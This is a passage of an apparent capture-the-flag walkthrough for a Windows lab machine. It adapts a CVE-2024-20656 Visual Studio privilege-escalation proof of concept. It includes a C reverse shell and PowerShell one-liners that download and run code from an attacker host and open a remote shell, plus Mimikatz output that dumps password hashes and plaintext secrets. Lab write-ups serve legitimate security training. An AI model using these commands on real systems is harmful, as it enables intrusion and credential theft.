PS C:\> Enter-VsDevShell 84a1ffb2
**********************************************************************
** Visual Studio 2019 Developer PowerShell v16.10.0
** Copyright (c) 2021 Microsoft Corporation
**********************************************************************
PS C:\Users\Emily\source\repos> 
```

I looked through all security advisories mentioned in <https://learn.microsoft.com/en-us/visualstudio/releases/2019/release-notes> and found a good candidate:  
[CVE-2024-20656](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20656): A vulnerability exists in the VSStandardCollectorService150 service, where local attackers can escalate privileges on hosts where an affected installation of Microsoft Visual Studio is running.  
The vulnerability was discovered by none other than [Filip Dragović](https://x.com/filip_dragovic). I found his PoC: <https://github.com/Wh04m1001/CVE-2024-20656>

Clone the repo and make a change on the first assignment, as the version of Visual Studio is different in our case.

```diff
-WCHAR cmd[] = L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
+WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
```

Another change has to be made in the function `cb1()` since we do not have RDP access.  
Instead of running `cmd.exe` with privileges, we need it to run our reverse shell with privileges.

```diff
-    CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
+    CopyFile(L"c:\\windows\\tasks\\opcode.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
```

Now open the solution, set the configuration to `Release` and the platform to `x64`.  
Select `Expl` in Solution Explorer and use <kbd>Ctrl</kbd> + <kbd>B</kbd> to build.

We also need to compile a reverse shell. I used something minimal:

```c
#include <windows.h>
#include <stdio.h>

int main() {
    UINT result = WinExec("powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001", SW_HIDE);

    if (result <= 31) {
        printf("WinExec failed with error code: %d\n", result);
        return 1;
    }
    
    return 0;
}
```

I compiled it with:

```console
opcode@debian$ x86_64-w64-mingw32-gcc -o opcode.exe opcode.c
```

Transfer all files and execute the exploit:

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/opcode.exe -o opcode.exe
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/CVE-2024-20656.exe -o CVE-2024-20656.exe
```

It failed. Expecting the permissions ACL over `revshell.exe` to be causing issues, I added the ACL `FullControl` for `Everyone`:

```console
PS C:\Windows\Tasks> $acl = Get-Acl C:\Windows\Tasks\opcode.exe
PS C:\Windows\Tasks> $fileSystemAccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("Todos", "FullControl", "Allow")
PS C:\Windows\Tasks> $acl.SetAccessRule($fileSystemAccessRule)
PS C:\Windows\Tasks> Set-Acl C:\Windows\Tasks\opcode.exe $acl
```

`Todos` is the Spanish equivalent of `Everyone`.  
I tried the exploit again, but it got stuck. I asked for hints and was pointed to <https://github.com/ruycr4ft/CVE-2024-20656/issues/1>.  
The box creator forked the exploit, and an issue was raised.  
The gist is that we need an interactive shell to run this exploit. [RunasCs](https://github.com/antonioCoco/RunasCs) can create an interactive session for us.

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/RunasCs.exe -o RunasCs.exe
PS C:\Windows\Tasks> .\RunasCs.exe Emily 12345678 'powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001'
```

Aside from that, running the exploit from a non-interactive session deletes the `MofCompiler.exe`. We need to replace it with an arbitrary executable as well.

```console
PS C:\Windows\Tasks> cp .\opcode.exe C:\ProgramData\Microsoft\VisualStudio\SetupWMI\MofCompiler.exe
PS C:\Windows\Tasks> .\CVE-2024-20656.exe
[+] Junction \\?\C:\c61ce818-6f9d-423c-9818-ecb837b60b04 -> \??\C:\bb45fbe3-fcc7-452f-835a-f12ea07e840b created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\c61ce818-6f9d-423c-9818-ecb837b60b04 -> \RPC Control created!
[+] Junction \\?\C:\c61ce818-6f9d-423c-9818-ecb837b60b04 -> \??\C:\bb45fbe3-fcc7-452f-835a-f12ea07e840b created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\c61ce818-6f9d-423c-9818-ecb837b60b04 -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!
```

It worked, and I obtained a shell as system:

```console
PS C:\ProgramData\Microsoft\VisualStudio\SetupWMI> whoami
nt authority\system
```

I wanted to test if Emily's other session with ID 1 would also work. I obtained a session 1 shell with [adopt](https://github.com/xct/adopt) again:

```console
PS C:\Windows\Tasks> .\adopt.exe explorer.exe C:\\Windows\\Tasks\\rcat_10.10.14.185_9001.exe
[>] Target pid is 5172
[>] ShellExecuteExW is at 00007FFD7B19DE80
[>] Thread running, done! (Handle: 204)
```

It worked from this session as well:

```console
PS C:\Windows\Tasks> .\CVE-2024-20656.exe
[+] Junction \\?\C:\c957af09-e29e-4f48-ae7a-6697d31c1325 -> \??\C:\815770cd-ec48-4872-b027-42407c87fc78 created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\c957af09-e29e-4f48-ae7a-6697d31c1325 -> \RPC Control created!
[+] Junction \\?\C:\c957af09-e29e-4f48-ae7a-6697d31c1325 -> \??\C:\815770cd-ec48-4872-b027-42407c87fc78 created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\c957af09-e29e-4f48-ae7a-6697d31c1325 -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!
```

We can use Mimikatz to dump SAM and LSA secrets:

```console
PS C:\> IEX(IWR http://10.10.14.185:8000/vividogz/Invoke-Mimikatz.ps1 -UseBasicParsing)
PS C:\> Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam" "lsadump::secrets"'
Hostname: COMPILED / authority\system-authority\system

  .#####.   mimikatz 2.2.0 (x64) #19041 Jan 29 2023 07:49:10
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

604     {0;000003e7} 1 D 51884          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 1367142     NT AUTHORITY\SYSTEM     S-1-5-18        (11g,19p)       Primary
 * Thread Token  : {0;000003e7} 1 D 1777791     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(powershell) # lsadump::sam
Domain : COMPILED
SysKey : ef9684d8a57e7877b9db904fe9bb3f87
Local SID : S-1-5-21-4093338461-994521390-3704224775

SAMKey : 565c2b9d0fa08697947f0ec82936a0b6

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: f75c95bc9312632edec46b607938061e

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : a8bdb4de233fcc523de7c295b60aa630

* Primary:Kerberos-Newer-Keys *
    Default Salt : DESKTOP-R3UQMMNAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7a46bc71c88814b77b54e2fea7028627b2dec86fd436880ced2c3f68b128e5f3
      aes128_hmac       (4096) : 904b3f567dd64033cab936670abee6d2
      des_cbc_md5       (4096) : 89aef29b2f52e5ab

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DESKTOP-R3UQMMNAdministrator
    Credentials
      des_cbc_md5       : 89aef29b2f52e5ab


RID  : 000001f5 (501)
User : Invitado

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: ac8352a8680463c78247b75a023999cc

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 3569d5e4165ccf6c8066d4c98cd47a4c

* Primary:Kerberos-Newer-Keys *
    Default Salt : WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d3f4619d50309b281e0af3859e8bd0de75b3a839d2f4289a5ab00757f3e39baf
      aes128_hmac       (4096) : d5c3fbaf968f31fda4c124b9e33f079b
      des_cbc_md5       (4096) : 2a769d20a1382f1f

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WDAGUtilityAccount
    Credentials
      des_cbc_md5       : 2a769d20a1382f1f


RID  : 000003e9 (1001)
User : Emily
  Hash NTLM: 259745cb123a52aa2e693aaacca2db52

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 56146bf0ea07641a2cb64c41a068f7c7

* Primary:Kerberos-Newer-Keys *
    Default Salt : COMPILEDEmily
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 2059000111e52df43201309b5cb744d0849aa8237877373e82784d510713591c
      aes128_hmac       (4096) : 1c225df0e8cb5fb0fd43eb31df913ff9
      des_cbc_md5       (4096) : 1f15a2a78c34260b
    OldCredentials
      aes256_hmac       (4096) : 069c47ebd45f1ce462cf62fb1a5a672bb25dd8b0cd1e06c9f9eb120cde444716
      aes128_hmac       (4096) : 8f92e5fd510ae35c043ea61e959b7506
      des_cbc_md5       (4096) : 80cdc1fe7ac24307
    OlderCredentials
      aes256_hmac       (4096) : 133fc63dfa50701e924171356cbb4ad1cd8674414b5a92f373915e74ca411938
      aes128_hmac       (4096) : 43a8e9710a1ad97dbdb07c500b186a79
      des_cbc_md5       (4096) : 02d59445e9165e52

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : COMPILEDEmily
    Credentials
      des_cbc_md5       : 1f15a2a78c34260b
    OldCredentials
      des_cbc_md5       : 80cdc1fe7ac24307


RID  : 000003ea (1002)
User : Richard
  Hash NTLM: f21635b4c33e9ed3ee47dd5b31ff0f92

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : d9810e30b14cf2a3db102859fc719ec1

* Primary:Kerberos-Newer-Keys *
    Default Salt : DESKTOP-R3UQMMNRichard
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : c16ad800abbf8d777814d4a44824985c8ee0e236b8128a21eb064869a2c141bd
      aes128_hmac       (4096) : ab8ac67135b2bf4e034b80f2bb5212b8
      des_cbc_md5       (4096) : 525e3db9adb0b358

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DESKTOP-R3UQMMNRichard
    Credentials
      des_cbc_md5       : 525e3db9adb0b358


mimikatz(powershell) # lsadump::secrets
Domain : COMPILED
SysKey : ef9684d8a57e7877b9db904fe9bb3f87

Local name : COMPILED ( S-1-5-21-4093338461-994521390-3704224775 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
LSA Key(s) : 1, default {9a50c6cc-ff36-860d-626b-97b40f861ebe}
  [00] {9a50c6cc-ff36-860d-626b-97b40f861ebe} 3c31b712ae7683b71dfe458c058fb2efde44c0b1f4dc5f6a3415a3667f6e0781

Secret  : DefaultPassword
cur/text: 12345678
old/text: emily2001

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 c3 4f 68 ce 31 ce 28 ce 51 74 36 b8 b0 66 1e 3f 26 ec 96 2a 0f 0c 49 c9 5a 8f 3c 10 ae 02 2f c0 6a e0 3e f1 43 92 9f 17
    full: c34f68ce31ce28ce517436b8b0661e3f26ec962a0f0c49c95a8f3c10ae022fc06ae03ef143929f17
    m/u : c34f68ce31ce28ce517436b8b0661e3f26ec962a / 0f0c49c95a8f3c10ae022fc06ae03ef143929f17
old/hex : 01 00 00 00 24 64 6f 1d cb fd 17 75 69 29 1c 74 46 fd dd f5 54 02 72 9e bf 24 60 54 85 30 18 f3 9a 3d f4 76 25 07 24 fa 09 96 4b 42
    full: 24646f1dcbfd177569291c7446fdddf55402729ebf246054853018f39a3df476250724fa09964b42
    m/u : 24646f1dcbfd177569291c7446fdddf55402729e / bf246054853018f39a3df476250724fa09964b42

Secret  : NL$KM
cur/hex : e8 41 48 e4 ad 40 60 12 5d 99 dc 98 41 71 6d c3 81 f8 e6 a5 b7 f6 1a 33 05 2d c3 c3 21 02 87 f5 2d 40 19 a7 3c d1 e1 c1 8c 82 a0 f6 48 a5 5f 2e c7 34 c5 5b 31 3d cc 2d b0 58 09 9b 6b a9 0a 72
old/hex : e8 41 48 e4 ad 40 60 12 5d 99 dc 98 41 71 6d c3 81 f8 e6 a5 b7 f6 1a 33 05 2d c3 c3 21 02 87 f5 2d 40 19 a7 3c d1 e1 c1 8c 82 a0 f6 48 a5 5f 2e c7 34 c5 5b 31 3d cc 2d b0 58 09 9b 6b a9 0a 72

Secret  : _SC_Gitea / service 'Gitea' with username : .\Richard
cur/text: RjN5wG2hM7sL4pT9
old/text: RjN5wG2hM7sL4pT9
```
